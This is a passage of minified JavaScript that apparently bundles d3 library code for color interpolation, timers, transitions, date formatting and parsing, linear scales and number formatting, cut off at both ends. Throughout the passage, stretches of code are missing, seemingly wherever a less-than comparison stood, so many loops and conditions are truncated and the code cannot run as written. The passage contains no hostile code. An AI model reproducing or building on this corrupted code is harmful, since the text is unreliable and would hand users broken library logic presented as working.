Math.pow(t+i*a,e)}}(a,e,t):lI(isNaN(a)?e:a)}}(a);function i(n,r){var c=e((n=VA(n)).r,(r=VA(r)).r),d=e(n.g,r.g),T=e(n.b,r.b),k=WH(n.opacity,r.opacity);return function(q){return n.r=c(q),n.g=d(q),n.b=T(q),n.opacity=k(q),n+""}}return i.gamma=t,i}(1);function FH(t){return function(a){var c,d,e=a.length,i=new Array(e),n=new Array(e),r=new Array(e);for(c=0;c=1?(e=1,a-1):Math.floor(e*a),n=t[i],r=t[i+1];return LH((e-i/a)*a,i>0?t[i-1]:2*n-r,n,r,ie&&(r=a.slice(e,r),d[c]?d[c]+=r:d[++c]=r),(i=i[0])===(n=n[0])?d[c]?d[c]+=n:d[++c]=n:(d[++c]=null,T.push({i:c,x:Rm(i,n)})),e=mI.lastIndex;return e=0&&t._call.call(null,a),t=t._next;--Z1}()}finally{Z1=0,function V4e(){for(var t,e,a=UA,i=1/0;a;)a._call?(i>a._time&&(i=a._time),t=a,a=a._next):(e=a._next,a._next=null,a=t?t._next=e:UA=e);Ob=t,hI(i)}(),xg=0}}function F4e(){var t=Nb.now(),a=t-qA;a>1e3&&(GA-=a,qA=t)}function hI(t){Z1||(kb&&(kb=clearTimeout(kb)),t-xg>24?(t<1/0&&(kb=setTimeout(jH,t-Nb.now()-GA)),Pb&&(Pb=clearInterval(Pb))):(Pb||(qA=Nb.now(),Pb=setInterval(F4e,1e3)),Z1=1,qH(jH)))}function QH(t,a,e){var i=new jA;return i.restart(n=>{i.stop(),t(n+a)},a=null==a?0:+a,e),i}jA.prototype=GH.prototype={constructor:jA,restart:function(t,a,e){if("function"!=typeof t)throw new TypeError("callback is not a function");e=(null==e?uI():+e)+(null==a?0:+a),!this._next&&Ob!==this&&(Ob?Ob._next=this:UA=this,Ob=this),this._call=t,this._time=e,hI()},stop:function(){this._call&&(this._call=null,this._time=1/0,hI())}};var B4e=DH("start","end","cancel","interrupt"),H4e=[];function KA(t,a,e,i,n,r){var c=t.__transition;if(c){if(e in c)return}else t.__transition={};!function U4e(t,a,e){var n,i=t.__transition;function c(k){var q,Y,te,pe;if(1!==e.state)return T();for(q in i)if((pe=i[q]).name===e.name){if(3===pe.state)return QH(c);4===pe.state?(pe.state=6,pe.timer.stop(),pe.on.call("interrupt",t,t.__data__,pe.index,pe.group),delete i[q]):+q0)throw new Error("too late; already scheduled");return e}function Ru(t,a){var e=Sm(t,a);if(e.state>3)throw new Error("too late; already running");return e}function Sm(t,a){var e=t.__transition;if(!e||!(e=e[a]))throw new Error("transition not found");return e}var XA,YH=180/Math.PI,CI={translateX:0,translateY:0,rotate:0,skewX:0,scaleX:1,scaleY:1};function JH(t,a,e,i,n,r){var c,d,T;return(c=Math.sqrt(t*t+a*a))&&(t/=c,a/=c),(T=t*e+a*i)&&(e-=t*T,i-=a*T),(d=Math.sqrt(e*e+i*i))&&(e/=d,i/=d,T/=d),t*i180?q+=360:q-k>180&&(k+=360),te.push({i:Y.push(n(Y)+"rotate(",null,i)-2,x:Rm(k,q)})):q&&Y.push(n(Y)+"rotate("+q+i)}(k.rotate,q.rotate,Y,te),function d(k,q,Y,te){k!==q?te.push({i:Y.push(n(Y)+"skewX(",null,i)-2,x:Rm(k,q)}):q&&Y.push(n(Y)+"skewX("+q+i)}(k.skewX,q.skewX,Y,te),function T(k,q,Y,te,pe,Re){if(k!==Y||q!==te){var Fe=pe.push(n(pe)+"scale(",null,",",null,")");Re.push({i:Fe-4,x:Rm(k,Y)},{i:Fe-2,x:Rm(q,te)})}else(1!==Y||1!==te)&&pe.push(n(pe)+"scale("+Y+","+te+")")}(k.scaleX,k.scaleY,q.scaleX,q.scaleY,Y,te),k=q=null,function(pe){for(var Ne,Re=-1,Fe=te.length;++Re=0&&(a=a.slice(0,e)),!a||"start"===a})}(a)?_I:Ru;return function(){var c=r(this,t),d=c.on;d!==i&&(n=(i=d).copy()).on(a,e),c.on=n}}var I3e=wb.prototype.constructor;function tU(t){return function(){this.style.removeProperty(t)}}function L3e(t,a,e){return function(i){this.style.setProperty(t,a.call(this,i),e)}}function z3e(t,a,e){var i,n;function r(){var c=a.apply(this,arguments);return c!==n&&(i=(n=c)&&L3e(t,c,e)),i}return r._value=a,r}function H3e(t){return function(a){this.textContent=t.call(this,a)}}function U3e(t){var a,e;function i(){var n=t.apply(this,arguments);return n!==e&&(a=(e=n)&&H3e(n)),a}return i._value=t,i}var Q3e=0;function ef(t,a,e,i){this._groups=t,this._parents=a,this._name=e,this._id=i}function iU(){return++Q3e}var wg=wb.prototype;ef.prototype=function $3e(t){return wb().transition(t)}.prototype={constructor:ef,select:function x3e(t){var a=this._name,e=this._id;"function"!=typeof t&&(t=iI(t));for(var i=this._groups,n=i.length,r=new Array(n),c=0;c2&&i.state<5,i.state=6,i.timer.stop(),i.on.call(n?"interrupt":"cancel",t,t.__data__,i.index,i.group),delete e[c]):r=!1;r&&delete t.__transition}}(this,t)})},wb.prototype.transition=function J3e(t){var a,e;t instanceof ef?(a=t._id,t=t._name):(a=iU(),(e=X3e).time=uI(),t=null==t?null:t+"");for(var i=this._groups,n=i.length,r=0;ra?1:t>=a?0:NaN}function xI(t){let a=t,e=t;function i(c,d,T,k){for(null==T&&(T=0),null==k&&(k=c.length);T>>1;e(c[q],d)<0?T=q+1:k=q}return T}return 1===t.length&&(a=(c,d)=>t(c)-d,e=function dAe(t){return(a,e)=>DI(t(a),e)}(t)),{left:i,center:function r(c,d,T,k){null==T&&(T=0),null==k&&(k=c.length);const q=i(c,d,T,k-1);return q>T&&a(c[q-1],d)>-a(c[q],d)?q-1:q},right:function n(c,d,T,k){for(null==T&&(T=0),null==k&&(k=c.length);T>>1;e(c[q],d)>0?k=q:T=q+1}return T}}}["w","e"].map(Lb),["n","s"].map(Lb),["n","w","e","s","nw","ne","sw","se"].map(Lb);var wI=Math.sqrt(50),II=Math.sqrt(10),RI=Math.sqrt(2);function cU(t,a,e){var i=(a-t)/Math.max(0,e),n=Math.floor(Math.log(i)/Math.LN10),r=i/Math.pow(10,n);return n>=0?(r>=wI?10:r>=II?5:r>=RI?2:1)*Math.pow(10,n):-Math.pow(10,-n)/(r>=wI?10:r>=II?5:r>=RI?2:1)}function SI(t,a,e){var i=Math.abs(a-t)/Math.max(0,e),n=Math.pow(10,Math.floor(Math.log(i)/Math.LN10)),r=i/n;return r>=wI?n*=10:r>=II?n*=5:r>=RI&&(n*=2),a0))return T;do{T.push(k=new Date(+r)),a(r,d),t(r)}while(k=c)for(;t(c),!r(c);)c.setTime(c-1)},function(c,d){if(c>=c)if(d<0)for(;++d<=0;)for(;a(c,-1),!r(c););else for(;--d>=0;)for(;a(c,1),!r(c););})},e&&(n.count=function(r,c){return OI.setTime(+r),NI.setTime(+c),t(OI),t(NI),Math.floor(e(OI,NI))},n.every=function(r){return r=Math.floor(r),isFinite(r)&&r>0?r>1?n.filter(i?function(c){return i(c)%r==0}:function(c){return n.count(0,c)%r==0}):n:null}),n}var ZA=$s(function(){},function(t,a){t.setTime(+t+a)},function(t,a){return a-t});ZA.every=function(t){return t=Math.floor(t),isFinite(t)&&t>0?t>1?$s(function(a){a.setTime(Math.floor(a/t)*t)},function(a,e){a.setTime(+a+e*t)},function(a,e){return(e-a)/t}):ZA:null};const uAe=ZA;const zb=$s(function(t){t.setTime(t-t.getMilliseconds())},function(t,a){t.setTime(+t+a*af)},function(t,a){return(a-t)/af},function(t){return t.getUTCSeconds()});const uU=$s(function(t){t.setTime(t-t.getMilliseconds()-t.getSeconds()*af)},function(t,a){t.setTime(+t+a*Fd)},function(t,a){return(a-t)/Fd},function(t){return t.getMinutes()});const fU=$s(function(t){t.setTime(t-t.getMilliseconds()-t.getSeconds()*af-t.getMinutes()*Fd)},function(t,a){t.setTime(+t+a*nf)},function(t,a){return(a-t)/nf},function(t){return t.getHours()});const eT=$s(t=>t.setHours(0,0,0,0),(t,a)=>t.setDate(t.getDate()+a),(t,a)=>(a-t-(a.getTimezoneOffset()-t.getTimezoneOffset())*Fd)/Ig,t=>t.getDate()-1);function Rg(t){return $s(function(a){a.setDate(a.getDate()-(a.getDay()+7-t)%7),a.setHours(0,0,0,0)},function(a,e){a.setDate(a.getDate()+7*e)},function(a,e){return(e-a-(e.getTimezoneOffset()-a.getTimezoneOffset())*Fd)/kI})}var tT=Rg(0),iT=Rg(1),a2=(Rg(2),Rg(3),Rg(4));const gU=(Rg(5),Rg(6),$s(function(t){t.setDate(1),t.setHours(0,0,0,0)},function(t,a){t.setMonth(t.getMonth()+a)},function(t,a){return a.getMonth()-t.getMonth()+12*(a.getFullYear()-t.getFullYear())},function(t){return t.getMonth()}));var LI=$s(function(t){t.setMonth(0,1),t.setHours(0,0,0,0)},function(t,a){t.setFullYear(t.getFullYear()+a)},function(t,a){return a.getFullYear()-t.getFullYear()},function(t){return t.getFullYear()});LI.every=function(t){return isFinite(t=Math.floor(t))&&t>0?$s(function(a){a.setFullYear(Math.floor(a.getFullYear()/t)*t),a.setMonth(0,1),a.setHours(0,0,0,0)},function(a,e){a.setFullYear(a.getFullYear()+e*t)}):null};const Sg=LI;const gAe=$s(function(t){t.setUTCSeconds(0,0)},function(t,a){t.setTime(+t+a*Fd)},function(t,a){return(a-t)/Fd},function(t){return t.getUTCMinutes()});const CAe=$s(function(t){t.setUTCMinutes(0,0,0)},function(t,a){t.setTime(+t+a*nf)},function(t,a){return(a-t)/nf},function(t){return t.getUTCHours()});const zI=$s(function(t){t.setUTCHours(0,0,0,0)},function(t,a){t.setUTCDate(t.getUTCDate()+a)},function(t,a){return(a-t)/Ig},function(t){return t.getUTCDate()-1});function kg(t){return $s(function(a){a.setUTCDate(a.getUTCDate()-(a.getUTCDay()+7-t)%7),a.setUTCHours(0,0,0,0)},function(a,e){a.setUTCDate(a.getUTCDate()+7*e)},function(a,e){return(e-a)/kI})}var WI=kg(0),aT=kg(1),n2=(kg(2),kg(3),kg(4));const AAe=(kg(5),kg(6),$s(function(t){t.setUTCDate(1),t.setUTCHours(0,0,0,0)},function(t,a){t.setUTCMonth(t.getUTCMonth()+a)},function(t,a){return a.getUTCMonth()-t.getUTCMonth()+12*(a.getUTCFullYear()-t.getUTCFullYear())},function(t){return t.getUTCMonth()}));var FI=$s(function(t){t.setUTCMonth(0,1),t.setUTCHours(0,0,0,0)},function(t,a){t.setUTCFullYear(t.getUTCFullYear()+a)},function(t,a){return a.getUTCFullYear()-t.getUTCFullYear()},function(t){return t.getUTCFullYear()});FI.every=function(t){return isFinite(t=Math.floor(t))&&t>0?$s(function(a){a.setUTCFullYear(Math.floor(a.getUTCFullYear()/t)*t),a.setUTCMonth(0,1),a.setUTCHours(0,0,0,0)},function(a,e){a.setUTCFullYear(a.getUTCFullYear()+e*t)}):null};const o2=FI;function vU(t,a,e,i,n,r){const c=[[zb,1,af],[zb,5,5e3],[zb,15,15e3],[zb,30,3e4],[r,1,Fd],[r,5,5*Fd],[r,15,15*Fd],[r,30,30*Fd],[n,1,nf],[n,3,3*nf],[n,6,6*nf],[n,12,12*nf],[i,1,Ig],[i,2,2*Ig],[e,1,kI],[a,1,lU],[a,3,3*lU],[t,1,PI]];function T(k,q,Y){const te=Math.abs(q-k)/Y,pe=xI(([,,Ne])=>Ne).right(c,te);if(pe===c.length)return t.every(SI(k/PI,q/PI,Y));if(0===pe)return uAe.every(Math.max(SI(k,q,Y),1));const[Re,Fe]=c[te/c[pe-1][2][a.toLowerCase(),e]))}function RAe(t,a,e){var i=Ks.exec(a.slice(e,e+1));return i?(t.w=+i[0],e+i[0].length):-1}function SAe(t,a,e){var i=Ks.exec(a.slice(e,e+1));return i?(t.u=+i[0],e+i[0].length):-1}function kAe(t,a,e){var i=Ks.exec(a.slice(e,e+2));return i?(t.U=+i[0],e+i[0].length):-1}function PAe(t,a,e){var i=Ks.exec(a.slice(e,e+2));return i?(t.V=+i[0],e+i[0].length):-1}function OAe(t,a,e){var i=Ks.exec(a.slice(e,e+2));return i?(t.W=+i[0],e+i[0].length):-1}function TU(t,a,e){var i=Ks.exec(a.slice(e,e+4));return i?(t.y=+i[0],e+i[0].length):-1}function EU(t,a,e){var i=Ks.exec(a.slice(e,e+2));return i?(t.y=+i[0]+(+i[0]>68?1900:2e3),e+i[0].length):-1}function NAe(t,a,e){var i=/^(Z)|([+-]\d\d)(?::?(\d\d))?/.exec(a.slice(e,e+6));return i?(t.Z=i[1]?0:-(i[2]+(i[3]||"00")),e+i[0].length):-1}function LAe(t,a,e){var i=Ks.exec(a.slice(e,e+1));return i?(t.q=3*i[0]-3,e+i[0].length):-1}function zAe(t,a,e){var i=Ks.exec(a.slice(e,e+2));return i?(t.m=i[0]-1,e+i[0].length):-1}function DU(t,a,e){var i=Ks.exec(a.slice(e,e+2));return i?(t.d=+i[0],e+i[0].length):-1}function WAe(t,a,e){var i=Ks.exec(a.slice(e,e+3));return i?(t.m=0,t.d=+i[0],e+i[0].length):-1}function xU(t,a,e){var i=Ks.exec(a.slice(e,e+2));return i?(t.H=+i[0],e+i[0].length):-1}function FAe(t,a,e){var i=Ks.exec(a.slice(e,e+2));return i?(t.M=+i[0],e+i[0].length):-1}function VAe(t,a,e){var i=Ks.exec(a.slice(e,e+2));return i?(t.S=+i[0],e+i[0].length):-1}function BAe(t,a,e){var i=Ks.exec(a.slice(e,e+3));return i?(t.L=+i[0],e+i[0].length):-1}function HAe(t,a,e){var i=Ks.exec(a.slice(e,e+6));return i?(t.L=Math.floor(i[0]/1e3),e+i[0].length):-1}function UAe(t,a,e){var i=xAe.exec(a.slice(e,e+1));return i?e+i[0].length:-1}function qAe(t,a,e){var i=Ks.exec(a.slice(e));return i?(t.Q=+i[0],e+i[0].length):-1}function GAe(t,a,e){var i=Ks.exec(a.slice(e));return i?(t.s=+i[0],e+i[0].length):-1}function wU(t,a){return No(t.getDate(),a,2)}function jAe(t,a){return No(t.getHours(),a,2)}function QAe(t,a){return No(t.getHours()%12||12,a,2)}function $Ae(t,a){return No(1+eT.count(Sg(t),t),a,3)}function IU(t,a){return No(t.getMilliseconds(),a,3)}function KAe(t,a){return IU(t,a)+"000"}function XAe(t,a){return No(t.getMonth()+1,a,2)}function YAe(t,a){return No(t.getMinutes(),a,2)}function JAe(t,a){return No(t.getSeconds(),a,2)}function ZAe(t){var a=t.getDay();return 0===a?7:a}function eTe(t,a){return No(tT.count(Sg(t)-1,t),a,2)}function RU(t){var a=t.getDay();return a>=4||0===a?a2(t):a2.ceil(t)}function tTe(t,a){return t=RU(t),No(a2.count(Sg(t),t)+(4===Sg(t).getDay()),a,2)}function iTe(t){return t.getDay()}function aTe(t,a){return No(iT.count(Sg(t)-1,t),a,2)}function nTe(t,a){return No(t.getFullYear()%100,a,2)}function oTe(t,a){return No((t=RU(t)).getFullYear()%100,a,2)}function rTe(t,a){return No(t.getFullYear()%1e4,a,4)}function sTe(t,a){var e=t.getDay();return No((t=e>=4||0===e?a2(t):a2.ceil(t)).getFullYear()%1e4,a,4)}function cTe(t){var a=t.getTimezoneOffset();return(a>0?"-":(a*=-1,"+"))+No(a/60|0,"0",2)+No(a%60,"0",2)}function SU(t,a){return No(t.getUTCDate(),a,2)}function lTe(t,a){return No(t.getUTCHours(),a,2)}function dTe(t,a){return No(t.getUTCHours()%12||12,a,2)}function mTe(t,a){return No(1+zI.count(o2(t),t),a,3)}function kU(t,a){return No(t.getUTCMilliseconds(),a,3)}function uTe(t,a){return kU(t,a)+"000"}function hTe(t,a){return No(t.getUTCMonth()+1,a,2)}function fTe(t,a){return No(t.getUTCMinutes(),a,2)}function pTe(t,a){return No(t.getUTCSeconds(),a,2)}function _Te(t){var a=t.getUTCDay();return 0===a?7:a}function gTe(t,a){return No(WI.count(o2(t)-1,t),a,2)}function PU(t){var a=t.getUTCDay();return a>=4||0===a?n2(t):n2.ceil(t)}function CTe(t,a){return t=PU(t),No(n2.count(o2(t),t)+(4===o2(t).getUTCDay()),a,2)}function yTe(t){return t.getUTCDay()}function bTe(t,a){return No(aT.count(o2(t)-1,t),a,2)}function MTe(t,a){return No(t.getUTCFullYear()%100,a,2)}function vTe(t,a){return No((t=PU(t)).getUTCFullYear()%100,a,2)}function ATe(t,a){return No(t.getUTCFullYear()%1e4,a,4)}function TTe(t,a){var e=t.getUTCDay();return No((t=e>=4||0===e?n2(t):n2.ceil(t)).getUTCFullYear()%1e4,a,4)}function ETe(){return"+0000"}function OU(){return"%"}function NU(t){return+t}function LU(t){return Math.floor(+t/1e3)}function WU(t){return null===t?NaN:+t}!function ITe(t){(function DAe(t){var a=t.dateTime,e=t.date,i=t.time,n=t.periods,r=t.days,c=t.shortDays,d=t.months,T=t.shortMonths,k=Fb(n),q=Vb(n),Y=Fb(r),te=Vb(r),pe=Fb(c),Re=Vb(c),Fe=Fb(d),Ne=Vb(d),et=Fb(T),ut=Vb(T),Ze={a:function Pi(Li){return c[Li.getDay()]},A:function Oi(Li){return r[Li.getDay()]},b:function $i(Li){return T[Li.getMonth()]},B:function Na(Li){return d[Li.getMonth()]},c:null,d:wU,e:wU,f:KAe,g:oTe,G:sTe,H:jAe,I:QAe,j:$Ae,L:IU,m:XAe,M:YAe,p:function jn(Li){return n[+(Li.getHours()>=12)]},q:function yn(Li){return 1+~~(Li.getMonth()/3)},Q:NU,s:LU,S:JAe,u:ZAe,U:eTe,V:tTe,w:iTe,W:aTe,x:null,X:null,y:nTe,Y:rTe,Z:cTe,"%":OU},yt={a:function Kr(Li){return c[Li.getUTCDay()]},A:function to(Li){return r[Li.getUTCDay()]},b:function ol(Li){return T[Li.getUTCMonth()]},B:function Nl(Li){return d[Li.getUTCMonth()]},c:null,d:SU,e:SU,f:uTe,g:vTe,G:TTe,H:lTe,I:dTe,j:mTe,L:kU,m:hTe,M:fTe,p:function bn(Li){return n[+(Li.getUTCHours()>=12)]},q:function Xr(Li){return 1+~~(Li.getUTCMonth()/3)},Q:NU,s:LU,S:pTe,u:_Te,U:gTe,V:CTe,w:yTe,W:bTe,x:null,X:null,y:MTe,Y:ATe,Z:ETe,"%":OU},It={a:function vi(Li,Fa,Fn){var Si=pe.exec(Fa.slice(Fn));return Si?(Li.w=Re.get(Si[0].toLowerCase()),Fn+Si[0].length):-1},A:function xi(Li,Fa,Fn){var Si=Y.exec(Fa.slice(Fn));return Si?(Li.w=te.get(Si[0].toLowerCase()),Fn+Si[0].length):-1},b:function Za(Li,Fa,Fn){var Si=et.exec(Fa.slice(Fn));return Si?(Li.m=ut.get(Si[0].toLowerCase()),Fn+Si[0].length):-1},B:function wa(Li,Fa,Fn){var Si=Fe.exec(Fa.slice(Fn));return Si?(Li.m=Ne.get(Si[0].toLowerCase()),Fn+Si[0].length):-1},c:function en(Li,Fa,Fn){return oi(Li,a,Fa,Fn)},d:DU,e:DU,f:HAe,g:EU,G:TU,H:xU,I:xU,j:WAe,L:BAe,m:zAe,M:FAe,p:function Ai(Li,Fa,Fn){var Si=k.exec(Fa.slice(Fn));return Si?(Li.p=q.get(Si[0].toLowerCase()),Fn+Si[0].length):-1},q:LAe,Q:qAe,s:GAe,S:VAe,u:SAe,U:kAe,V:PAe,w:RAe,W:OAe,x:function Vo(Li,Fa,Fn){return oi(Li,e,Fa,Fn)},X:function Di(Li,Fa,Fn){return oi(Li,i,Fa,Fn)},y:EU,Y:TU,Z:NAe,"%":UAe};function St(Li,Fa){return function(Fn){var sl,fn,Jr,Si=[],Yr=-1,Zo=0,rl=Li.length;for(Fn instanceof Date||(Fn=new Date(+Fn));++Yr53)return null;"w"in Si||(Si.w=1),"Z"in Si?(rl=(Zo=BI(Wb(Si.y,0,1))).getUTCDay(),Zo=rl>4||0===rl?aT.ceil(Zo):aT(Zo),Zo=zI.offset(Zo,7*(Si.V-1)),Si.y=Zo.getUTCFullYear(),Si.m=Zo.getUTCMonth(),Si.d=Zo.getUTCDate()+(Si.w+6)%7):(rl=(Zo=VI(Wb(Si.y,0,1))).getDay(),Zo=rl>4||0===rl?iT.ceil(Zo):iT(Zo),Zo=eT.offset(Zo,7*(Si.V-1)),Si.y=Zo.getFullYear(),Si.m=Zo.getMonth(),Si.d=Zo.getDate()+(Si.w+6)%7)}else("W"in Si||"U"in Si)&&("w"in Si||(Si.w="u"in Si?Si.u%7:"W"in Si?1:0),rl="Z"in Si?BI(Wb(Si.y,0,1)).getUTCDay():VI(Wb(Si.y,0,1)).getDay(),Si.m=0,Si.d="W"in Si?(Si.w+6)%7+7*Si.W-(rl+5)%7:Si.w+7*Si.U-(rl+6)%7);return"Z"in Si?(Si.H+=Si.Z/100|0,Si.M+=Si.Z%100,BI(Si)):VI(Si)}}function oi(Li,Fa,Fn,Si){for(var sl,fn,Yr=0,Zo=Fa.length,rl=Fn.length;Yr=rl)return-1;if(37===(sl=Fa.charCodeAt(Yr++))){if(sl=Fa.charAt(Yr++),!(fn=It[sl in AU?Fa.charAt(Yr++):sl])||(Si=fn(Li,Fn,Si))<0)return-1}else if(sl!=Fn.charCodeAt(Si++))return-1}return Si}return Ze.x=St(e,Ze),Ze.X=St(i,Ze),Ze.c=St(a,Ze),yt.x=St(e,yt),yt.X=St(i,yt),yt.c=St(a,yt),{format:function(Li){var Fa=St(Li+="",Ze);return Fa.toString=function(){return Li},Fa},parse:function(Li){var Fa=Nt(Li+="",!1);return Fa.toString=function(){return Li},Fa},utcFormat:function(Li){var Fa=St(Li+="",yt);return Fa.toString=function(){return Li},Fa},utcParse:function(Li){var Fa=Nt(Li+="",!0);return Fa.toString=function(){return Li},Fa}}})(t)}({dateTime:"%x, %X",date:"%-m/%-d/%Y",time:"%-I:%M:%S %p",periods:["AM","PM"],days:["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],shortDays:["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],months:["January","February","March","April","May","June","July","August","September","October","November","December"],shortMonths:["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec"]});const RTe=xI(DI).right,VU=(xI(WU),RTe);function STe(t,a){return t=+t,a=+a,function(e){return Math.round(t*(1-e)+a*e)}}function PTe(t){return+t}var BU=[0,1];function s2(t){return t}function HI(t,a){return(a-=t=+t)?function(e){return(e-t)/a}:function kTe(t){return function(){return t}}(isNaN(a)?NaN:.5)}function NTe(t,a,e){var i=t[0],n=t[1],r=a[0],c=a[1];return na&&(e=t,t=a,a=e),function(i){return Math.max(t,Math.min(a,i))}}(t[0],t[te-1])),d=te>2?LTe:NTe,T=k=null,Y}function Y(te){return null==te||isNaN(te=+te)?r:(T||(T=d(t.map(i),a,e)))(i(c(te)))}return Y.invert=function(te){return c(n((k||(k=d(a,t.map(i),Rm)))(te)))},Y.domain=function(te){return arguments.length?(t=Array.from(te,PTe),q()):t.slice()},Y.range=function(te){return arguments.length?(a=Array.from(te),q()):a.slice()},Y.rangeRound=function(te){return a=Array.from(te),e=STe,q()},Y.clamp=function(te){return arguments.length?(c=!!te||s2,q()):c!==s2},Y.interpolate=function(te){return arguments.length?(e=te,q()):e},Y.unknown=function(te){return arguments.length?(r=te,Y):r},function(te,pe){return i=te,n=pe,q()}}()(s2,s2)}function Bb(t,a){switch(arguments.length){case 0:break;case 1:this.range(t);break;default:this.range(a).domain(t)}return this}var GU,HTe=/^(?:(.)?([<>=^]))?([+\-( ])?([$#])?(0)?(\d+)?(,)?(\.\d+)?(~)?([a-z%])?$/i;function nT(t){if(!(a=HTe.exec(t)))throw new Error("invalid format: "+t);var a;return new UI({fill:a[1],align:a[2],sign:a[3],symbol:a[4],zero:a[5],width:a[6],comma:a[7],precision:a[8]&&a[8].slice(1),trim:a[9],type:a[10]})}function UI(t){this.fill=void 0===t.fill?" ":t.fill+"",this.align=void 0===t.align?">":t.align+"",this.sign=void 0===t.sign?"-":t.sign+"",this.symbol=void 0===t.symbol?"":t.symbol+"",this.zero=!!t.zero,this.width=void 0===t.width?void 0:+t.width,this.comma=!!t.comma,this.precision=void 0===t.precision?void 0:+t.precision,this.trim=!!t.trim,this.type=void 0===t.type?"":t.type+""}function oT(t,a){if((e=(t=a?t.toExponential(a-1):t.toExponential()).indexOf("e"))<0)return null;var e,i=t.slice(0,e);return[i.length>1?i[0]+i.slice(2):i,+t.slice(e+1)]}function c2(t){return(t=oT(Math.abs(t)))?t[1]:NaN}function jU(t,a){var e=oT(t,a);if(!e)return t+"";var i=e[0],n=e[1];return n<0?"0."+new Array(-n).join("0")+i:i.length>n+1?i.slice(0,n+1)+"."+i.slice(n+1):i+new Array(n-i.length+2).join("0")}nT.prototype=UI.prototype,UI.prototype.toString=function(){return this.fill+this.align+this.sign+this.symbol+(this.zero?"0":"")+(void 0===this.width?"":Math.max(1,0|this.width))+(this.comma?",":"")+(void 0===this.precision?"":"."+Math.max(0,0|this.precision))+(this.trim?"~":"")+this.type};const QU={"%":(t,a)=>(100*t).toFixed(a),b:t=>Math.round(t).toString(2),c:t=>t+"",d:function UTe(t){return Math.abs(t=Math.round(t))>=1e21?t.toLocaleString("en").replace(/,/g,""):t.toString(10)},e:(t,a)=>t.toExponential(a),f:(t,a)=>t.toFixed(a),g:(t,a)=>t.toPrecision(a),o:t=>Math.round(t).toString(8),p:(t,a)=>jU(100*t,a),r:jU,s:function $Te(t,a){var e=oT(t,a);if(!e)return t+"";var i=e[0],n=e[1],r=n-(GU=3*Math.max(-8,Math.min(8,Math.floor(n/3))))+1,c=i.length;return r===c?i:r>c?i+new Array(r-c+1).join("0"):r>0?i.slice(0,r)+"."+i.slice(r):"0."+new Array(1-r).join("0")+oT(t,Math.max(0,a+r-1))[0]},X:t=>Math.round(t).toString(16).toUpperCase(),x:t=>Math.round(t).toString(16)};function $U(t){return t}var rT,YU,JU,KU=Array.prototype.map,XU=["y","z","a","f","p","n","\xb5","m","","k","M","G","T","P","E","Z","Y"];function eEe(t){var a=t.domain;return t.ticks=function(e){var i=a();return function mAe(t,a,e){var i,r,c,d,n=-1;if(e=+e,(t=+t)==(a=+a)&&e>0)return[t];if((i=a0){let T=Math.round(t/d),k=Math.round(a/d);for(T*da&&--k,c=new Array(r=k-T+1);++na&&--k,c=new Array(r=k-T+1);++n0;){if((k=cU(c,d,e))===T)return i[n]=c,i[r]=d,a(i);if(k>0)c=Math.floor(c/k)*k,d=Math.ceil(d/k)*k;else{if(!(k<0))break;c=Math.ceil(c*k)/k,d=Math.floor(d*k)/k}T=k}return t},t}function l2(){var t=UU();return t.copy=function(){return HU(t,l2())},Bb.apply(t,arguments),eEe(t)}function ZU(t,a,e){t=+t,a=+a,e=(n=arguments.length)<2?(a=t,t=0,1):n<3?1:+e;for(var i=-1,n=0|Math.max(0,Math.ceil((a-t)/e)),r=new Array(n);++i0&&d>0&&(T+d+1>i&&(d=Math.max(1,i-T)),r.push(e.substring(n-=d,n+d)),!((T+=d+1)>i));)d=t[c=(c+1)%t.length];return r.reverse().join(a)}}(KU.call(t.grouping,Number),t.thousands+""),e=void 0===t.currency?"":t.currency[0]+"",i=void 0===t.currency?"":t.currency[1]+"",n=void 0===t.decimal?".":t.decimal+"",r=void 0===t.numerals?$U:function jTe(t){return function(a){return a.replace(/[0-9]/g,function(e){return t[+e]})}}(KU.call(t.numerals,String)),c=void 0===t.percent?"%":t.percent+"",d=void 0===t.minus?"\u2212":t.minus+"",T=void 0===t.nan?"NaN":t.nan+"";function k(Y){var te=(Y=nT(Y)).fill,pe=Y.align,Re=Y.sign,Fe=Y.symbol,Ne=Y.zero,et=Y.width,ut=Y.comma,Ze=Y.precision,yt=Y.trim,It=Y.type;"n"===It?(ut=!0,It="g"):QU[It]||(void 0===Ze&&(Ze=12),yt=!0,It="g"),(Ne||"0"===te&&"="===pe)&&(Ne=!0,te="0",pe="=");var St="$"===Fe?e:"#"===Fe&&/[boxX]/.test(It)?"0"+It.toLowerCase():"",Nt="$"===Fe?i:/[%p]/.test(It)?c:"",oi=QU[It],Ai=/[defgprs%]/.test(It);function vi(xi){var en,Vo,Di,Za=St,wa=Nt;if("c"===It)wa=oi(xi)+wa,xi="";else{var Pi=(xi=+xi)<0||1/xi<0;if(xi=isNaN(xi)?T:oi(Math.abs(xi),Ze),yt&&(xi=function QTe(t){e:for(var n,a=t.length,e=1,i=-1;e0&&(i=0)}return i>0?t.slice(0,i)+t.slice(n+1):t}(xi)),Pi&&0==+xi&&"+"!==Re&&(Pi=!1),Za=(Pi?"("===Re?Re:d:"-"===Re||"("===Re?"":Re)+Za,wa=("s"===It?XU[8+GU/3]:"")+wa+(Pi&&"("===Re?")":""),Ai)for(en=-1,Vo=xi.length;++en(Di=xi.charCodeAt(en))||Di>57){wa=(46===Di?n+xi.slice(en+1):xi.slice(en))+wa,xi=xi.slice(0,en);break}}ut&&!Ne&&(xi=a(xi,1/0));var Oi=Za.length+xi.length+wa.length,$i=Oi>1)+Za+xi+wa+$i.slice(Oi);break;default:xi=$i+Za+xi+wa}return r(xi)}return Ze=void 0===Ze?6:/[gprs]/.test(It)?Math.max(1,Math.min(21,Ze)):Math.max(0,Math.min(20,Ze)),vi.toString=function(){return Y+""},vi}return{format:k,formatPrefix:function q(Y,te){var pe=k(((Y=nT(Y)).type="f",Y)),Re=3*Math.max(-8,Math.min(8,Math.floor(c2(te)/3))),Fe=Math.pow(10,-Re),Ne=XU[8+Re/3];return function(et){return pe(Fe*et)+Ne}}}}(t),YU=rT.format,JU=rT.formatPrefix}({thousands:",",grouping:[3],currency:["$",""]});const eq=Symbol("implicit");function qI(){var t=new Map,a=[],e=[],i=eq;function n(r){var c=r+"",d=t.get(c);if(!d){if(i!==eq)return i;t.set(c,d=a.push(r))}return e[(d-1)%e.length]}return n.domain=function(r){if(!arguments.length)return a.slice();a=[],t=new Map;for(const c of r){const d=c+"";t.has(d)||t.set(d,a.push(c))}return n},n.range=function(r){return 